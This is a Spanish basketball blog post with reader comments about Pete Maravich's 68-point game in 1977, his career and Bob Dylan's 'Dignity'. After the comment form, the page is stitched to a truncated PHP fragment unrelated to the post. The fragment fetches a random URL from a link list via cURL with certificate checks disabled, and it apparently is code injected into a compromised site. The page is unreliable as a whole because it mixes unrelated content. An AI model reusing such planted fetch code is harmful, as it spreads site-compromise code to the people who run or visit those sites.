El jugón de la triste figura

06 de September de 2012 por TheDeerHunter

“Sometimes I wonder what it’s gonna take to find dignity”

Bob Dylan. (Dignity)

Qué mejor manera de volver a la actividad que recuperando la serie de partidos históricos y poniéndonos en plan “vintage” de verdad. Me permitiréis hablar de una de mis debilidades personales.Cuando hace tres años publicamos la lista de nuestros 50 mejores de la historia no faltaron críticas por incluir a Pistol Maravich en el top 30 de todos los tiempos. Admito que siempre hubo sobradas razones para cuestionar una elección tan alta para un jugador cuya carrera en la NBA es considerada mayoritariamente como un fracaso, especialmente si atendemos a los criterios pragmáticos a los que estamos acostumbrados actualmente. Supongo que si quisiéramos rehacer  aquella lista de 50 él sería uno de los puntos a revisar más atentamente… o quizás no. “Pistol Pete” siempre fue una excepción a cualquier regla. Eso es lo verdaderamente grandioso de su leyenda.

No todos los mitos de la NBA han inspirado a artistas de la talla de Bob Dylan. La fascinación general por Maravich, diría, tiene su origen en varios puntos: Lo trágico de su historia personal y deportiva, con esa infelicidad declarada y el alcoholismo; su temprana muerte y el defecto cardíaco congénito que debería habérselo llevado aún mucho antes; su imagen y halo personal, y por supuesto, su talento y herencia baloncestística, que es incalculable y no tiene nada que ver con sus logros objetivos en la liga. Como dijimos en su día, un visionario y un ejemplo claro de hombre adelantado a su tiempo. Añado a título personal el desconocimiento general sobre su juego por motivos lógicos. Para muestra el botón de esa extraña comparación que le hacen a Ricky Rubio. Pronto iremos al tema porque de lo que se trata hoy es de verle en acción. 

Viajamos al curso baloncestístico 1976-1977, la cima de su carrera en su tercera temporada con los New Orleans Jazz. Él era el hombre orquesta en una franquicia sin horizontes. Jugaba al lado de un Gail Goodrich veterano y tras ellos se abría prácticamente el vacío con nombres prácticamente desconocidos como Nate Williams, Aaron James o Jim McElroy… Maravich era el líder en puntos (el máximo cañonero de la liga ese año con 31.1ppp), asistencias y robos. De haber alcanzado la postemporada podría haber sido elegido MVP. Jamás lo logró con los Jazz, pero ningún otro lugar que en New Orleans se entendería mejor su arte.

El 25 de Febrero de 1977, en el otro rincón del ring, con calzones azules, se encontraban los New York Knicks. El equipo de Red Holzman, siendo justos, ya no era el “jumbo” bi-campeón de hacía nada, pero quitando a Willis Reed mantenía la base y había añadido nada menos que a un McAdoo en plena efervescencia. Frazier ya no era el mejor base del mundo, ni el terrorífico defensor que había sido, pero el perímetro de los Knicks aún conservaba un prestigio. Sin embargo, por algún motivo, como ha ocurrido con otros grandes, enfrentarse a los Knicks insuflaba un extra de motivación al “pistolero”. Mejor hubiera sido para ellos no haberse levantado de la cama.

Su marca no requiere muchos comentarios adicionales. 68 puntos sin línea de tres, 6 asistencias y 6 rebotes en 43 minutos en pista. En ese tiempo, podemos observar una muestra de su repertorio ofensivo. Exquisitas suspensiones, bote depuradísimo con ambas manos, penetraciones, fintas, ganchos, cambios de ritmo, rectificados… incluso el famoso látigo que años más tarde popularizó Bodiroga (2:48). Un escándalo técnico, un superdotado. De paso, los más avispados pueden detectar diferencias y ¿similitudes? frente al estilo de nuestro Ricky (sin el más mínimo ánimo de menospreciarle, ojo).

El partido completo se puede disfrutar también en el “tutube”:

En definitiva, “Pistol” Pete Maravich fue fundamentalmente un bombardero. Un anotador que no se cortaba un duro de lanzar todo lo que hiciera falta, pero también un excelente e imaginativo pasador y un más que notable interceptor de balones.

Por supuesto tenía sus defectos que seguramente influyeron en que no alcanzara su sueño del anillo. Un físico mejorable, carácter inconsistente y nivel defensivo no excelso… pero una técnica a la altura de los más grandes y, sobre todo, un sentido del espectáculo que a él le perjudicó en su tiempo pero abrió muchas puertas a la Edad de Oro de los 80, justo cuando se retiró.

“No soy una persona avariciosa. No me preocupa tener diez anillos. Sólo quiero uno”

P.M.

Murió a los 40 en un partido benéfico en una cancha de Pasadena aparentemente despreocupado y feliz tras haber vencido todos sus fantasmas. Dylan escribía su “Dignity” al día siguiente inspirado en todo eso.

Un dios insuperable en la LSU y un “fracaso” en la NBA. Hall of Fame en el 87 y elegido entre los 50 mejores de la historia en 1996. A fecha de hoy, puesto arriba, puesto abajo, se le considera una leyenda indiscutible. Ni la liga, ni el baloncesto moderno se podrían entender sin la anomalía de su presencia.

Apostaría a que todo eso vale tanto o más que cualquier título.

Comenta

13 comentarios a esta entrada

  1. portu7 dice:
    #1

    Sólo en el 1er minuto del video resumen mete más tiros de 5 metros q Ricky en toda su vida, jeje, sobran comparaciones. Tenía en mente todo lo q se podía hacer en ataque tanto de forma individual como pasando a un compañero, un verdadero jugón.

      Citar

  2. Sancho88 dice:
    #2

    precioso homenaje Deer. Una de las grandes leyendas del basket desconocida para muchos (entre los que me incluyo) pero que sin duda hizo maravillas. Efectivamente, los estilos de Ricky y Maravich son totalmente incomparables, y solo se asemejan algo en el físico y en el pelo, porque otra cosa… difícil. Un gran primer plato para abrir la temporada. Así da gusto

      Citar

  3. Nacho dice:
    #3

    He visto algún reportaje sobre Maravich. El jugador más parecido podría ser Petrovic (yo por una debilidad brutal me quedo con el balcánico)
    Sobre la comparación, creo que nos equivocamos. Lo que se quiere decir no es que sean iguales en estilo de juego (que no lo son, obviamente), si no en impacto, y en descubrir cosas que ven ellos (espectáculo en sí) y otros no. Nadie duda de que Love es el jugador franquicia de los Wolves, pero el que levanta al público, provoca los OHHHS y es ‘diferente’ es Ricky. Y es el que cambió la dinámica del equipo. Que se quede en flor de un día, como pronostican muchos (algunos aquí), puede ser, pero ese impacto creado en la fría Mnny no lo quita nadie. Y esa es la comparación que se hace con Pete.

      Citar

  4. TheDeerHunter dice:
    #4

    No termino de estar de acuerdo contigo Nacho.
    La comparación de Ricky la arrastra desde que tenía 15 años y no había soñado nunca con levantar del asiento a ningún lugareño de Minneapolis.

    En mi opinión la comparación viene del remoto parecido físico, blancos, morenos y delgados… porque por ahí no le van a mentar a Isiah Thomas… Después Ricky es eminentemente colectivo y Pete individual… el uno un extraordinario defensor y el otro más bien tirando a flojillo.
    El asunto quizás es que incluso en los USA el poso que quedó de Maravich fue más de pasador que otra cosa, no hay más que ponerse a mirar vídeos, y es por esas fantásticas acciones que quedan en la retina, diría, con las que podemos establecer el contacto entre ellos.

    Un contacto muy puntual, porque por perfil de jugador eran prácticamente antagónicos.

      Citar

  5. TheDeerHunter dice:
    #5

    Y sí… la comparación con Petrovic está muchísimo mejor traída…. quitando el carácter de ambos, que vaya tela el balcánico

      Citar

  6. M dice:
    #6

    Apunte dylaninano y off-topic, Dylan le nombre en sus crónicas, buscaré el fragmento…bueno, aquí se puede leer

    http://books.google.es/books?id=uNOf_w5vWakC&pg=PA168&lpg=PA168&dq=bob+dylan+cronicas+pete+maravich&source=bl&ots=P2v3twcJRE&sig=Y71WBmFCBpCslM4IK3owUb6r8iU&hl=es#v=onepage&q=bob%20dylan%20cronicas%20pete%20maravich&f=false

    Por si os interesa 🙂 Bellas palabras.

      Citar

  7. Nacho dice:
    #7

    TheDeerHunter:
    No termino de estar de acuerdo contigo Nacho.
    La comparación de Ricky la arrastra desde que tenía 15 años y no había soñado nunca con levantar del asiento a ningún lugareño de Minneapolis.

    En mi opinión la comparación viene del remoto parecido físico, blancos, morenos y delgados… porque por ahí no le van a mentar a Isiah Thomas… Después Ricky es eminentemente colectivo y Pete individual… el uno un extraordinario defensor y el otro más bien tirando a flojillo.
    El asunto quizás es que incluso en los USA el poso que quedó de Maravich fue más de pasador que otra cosa, no hay más que ponerse a mirar vídeos, y es por esas fantásticas acciones que quedan en la retina, diría, con las que podemos establecer el contacto entre ellos.

    Un contacto muy puntual, porque por perfil de jugador eran prácticamente antagónicos.

    Si la comparación viene de largo, me callo. También he visto vídeos de Drazen (aunque a éste le vi jugar) en el que da unos pases de vértigo (igual los únicos). Cierto que la memoria retiene cosas y olvida otras. (Yo por ejemplo recordaré a Lolo Saiz y a Aíto como dos pestiños de entrenadores – y serían buenos-. Y con George Karl me pasa más de lo mismo)
    Vaya rollo, solo para callar mi primer comentario (que más que nada era para disculpar a los yanquis -¡por una vez!-)

      Citar

  8. TheDeerHunter dice:
    #8

    @Nacho: Hombre, yo no pretendía “callar tu primer comentario”, crack. Forma parte del debate.
    Esos pases geniales que comentas sí son comunes a Maravich, Ricky… y Petrovich.
    Supongo que era lógico ponerse a repasar ese capazo de vídeos que se generó del Ricky más chiquillo, un hype sin precedentes en nuestro país, y siendo americano caer en la comparación… a base de highlights.
    Como suele suceder, el highlight no define al jugador. En estos dos casos quizá especialmente.

    @M: Para nada es un offtopic. Bob Dylan habla de Maravich sin tapujos… y es público que escribió Dignity inspirado en su muerte. Ya había leído ese texto, de hecho es otra de las cosas que me motivó a escribir este post. Admiro a Dylan y es otro aspecto que me fascina… aunque si te he de ser sincero, la canción de marras no es de mis preferidas.

      Citar

  9. GreenPride dice:
    #9

    Gran artículo para abrir temporada!!!
    Un gran desconocido el señor Maravich que tenía magia hasta en el nombre. Por lo que yo he podido ver de él era un genio del basket y como muchos genios gozaba y sufría de un carácter que le hacía ser especial y polémico y destructivo al mismo tiempo.
    En lo meramente baloncestístico era una máquina anotadora como se han visto pocas pues dominaba casi todos los aspectos técnicos. Fenomenal botador y lanzador y con una creatividad penetrando bestial. Esa creatividad la usaba también a la hora de pasar, dando unos pases que han quedado para la historia.
    En cuanto a su comparación con Ricky, más bien por el físico y porque Ricky ve pases como los veía Maravich que te pueden levantar del asiento. Más allá de eso, Maravich era increíble anotando y Ricky es más bien flojo y Ricky es un perro de presa defensivo y Maravich más bien pasabable sólo destacando por su intuición robando balones (aspecto que comparte con Ricky).
    Un jugador genial y adelantado a su tiempo, si jugara hoy tendría legiones de seguidores por su espectacularidad. Otro ejemplo de que el físico no lo es todo en este deporte.

      Citar

  10. El jugón de la triste sonrisa | Artículos de Basket dice:
    #10
  11. Nacho dice:
    #11

    TheDeerHunter:
    @Nacho: Hombre, yo no pretendía “callar tu primer comentario”, crack. Forma parte del debate.
    Esos pases geniales que comentas sí son comunes a Maravich, Ricky… y Petrovich.
    Supongo que era lógico ponerse a repasar ese capazo de vídeos que se generó del Ricky más chiquillo, un hype sin precedentes en nuestro país, y siendo americano caer en la comparación… a base de highlights.
    Como suele suceder, el highlight no define al jugador. En estos dos casos quizá especialmente.

    Si no molesta, lo hacía por mezclar coña con mi ignorancia. Creía que la comparación era de este año, cuando Shaq y los comentaristas lo decían.
    Ahora sí, desde luego estos tres son los tipos de jugadores con los que flipo. Y por mucho Jordan, Magic o quien se ponga nadie me ha hecho amar este deporte como el ‘cabrón’ del Drazen. Y después de ver vídeos de Maravich he tenido esa cosita de haberlo querido disfrutar en su época (claro que para eso tenía que vivir en USA, porque para ver sus partidos aquí… No saben los Melo15 y compañía la suerte que tienen…

      Citar

  12. simon dice:
    #12

    Tras las comparaciones que se hacen desde siempre entre RIcky y Maravich pensaba en Maravich como un Play maker puro y duro ( como RIcky ) y ahora veo que las comparaciones son simplemente por el fisicio y por esa “mistica” que los rodea pues sus estilos eran bien distintos… interesantisimos estos articulos e imprescindibles! mas de estos por favor!

      Citar

  13. Larry Bird dice:
    #13

    Y mientras leo esto, como no podía ser de otra manera, escucho Dignity, de Bob Dylan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>